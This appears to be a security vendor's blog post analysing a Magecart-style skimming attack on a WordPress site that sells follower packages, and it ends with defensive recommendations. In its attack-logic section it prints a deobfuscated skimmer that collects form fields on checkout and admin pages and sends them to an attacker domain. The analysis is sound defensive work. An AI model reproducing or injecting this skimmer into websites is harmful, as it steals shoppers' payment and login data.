We recently identified a Magecart-style skimming attack still active on the WordPress site intertwitter[.]com, a suspicious platform offering Twitter (X) follower packages. While this is dubious as is (buying X followers is against the TOS), more concerning is the reuse of old infrastructure and how long this attack has remained undetected in the wild.
The live URLScan.io
Originally reported: Sansec, February 2024
Sansec confirms that malicious infrastructure often remains active for extended periods, sometimes even two years. Relying on the Internet police to take down rogue servers is therefore not a reliable defense strategy.
Willem de Groot - Sansec
The problem with IOC-only detection
Most security programs today still rely heavily on Indicators of Compromise (IOCs). This includes known malicious domains, IPs, hashes as the first (and often only) line of defense. While useful, this approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.
In this case:
- The malicious domain safecontentdelivery[.]com was flagged over a year ago.
- The same IOC was reused across multiple skimming campaigns.
- Despite being public for months, it remains active, suggesting no automated enforcement or widespread detection.
Just because an IOC is known, doesn’t mean it’s being blocked.
Attackers count on this. They recycle infrastructure, hide in less popular or sketchy websites, and bide their time until the detection window closes. After all, why reinvent the wheel?
We’ve seen this domain appear in multiple Magecart campaigns over the past year. Its longevity shows that list-based defenses are easy to outlive.
How client-side attacks hide in plain sight
Client-side attacks are notoriously difficult to detect. Not because they’re sophisticated in payload, but because they exist outside the visibility perimeter of traditional security tools.
Here’s why:
- No server-side compromise required: A single injected script (via a plugin, third-party library, or stored XSS) is enough.
- Executed only in the victim’s browser: Server logs, WAFs, and backend systems never see the malicious behavior.
- Obfuscation & evasion: These scripts use tricks like DevTools detection, overridden browser functions, and CORS-evading exfiltration to avoid analysis.
- Stealth activation logic: The script only activates on checkout or admin paths reducing exposure and avoiding attention.
Attack logic
- Trigger Condition: Activated only on URLs with /checkout or /admin.
- Targets: All form fields <input>, <select>, <textarea>.
- Exfiltrates via: new Image().src to bypass CORS.
- Destination: hxxps://csp[.]safecontentdelivery[.]com/app/panel/app.php.
- Anti-Analysis: Obfuscation, JSON tampering, and browser inspection detection.
Deobfuscated payload:
if (/checkout|admin/i.test(location.href)) {
const fields = document.querySelectorAll("input, select, textarea");
const data = {};
fields.forEach(field => {
const name = field.name || field.id;
const value = field.tagName === "SELECT"
? field.options[field.selectedIndex].text
: field.value;
if (name && value) data[name] = value;
});
const exfilUrl = `hxxps://csp[.]safecontentdelivery[.]com/app/panel/app.php?rnd=${Math.random() * 1e7}&data=${btoa(JSON.stringify(data))}&loc=${btoa(location.href)}`;
new Image().src = exfilUrl;
}How secure your business
Relying on IOCs alone is reactive. To defend against modern threats especially on the client side you need:
- Behavioral analysis: Detect patterns like credential/form scraping, suspicious script injection, and dynamic DOM changes.
- Runtime JavaScript monitoring: Use tools that analyze how scripts behave in real-time in the browser.
- Supply chain hygiene: Minimize third-party dependencies and use subresource integrity (SRI) where possible.
- Content Security Policies (CSP): Restrict what scripts can run and where they can send data.
- Regular browser-based scanning: Use tools like urlscan.io, headless Chrome scripts, or commercial web threat monitors to analyze what users actually experience.
For all of the above you can count on c/side.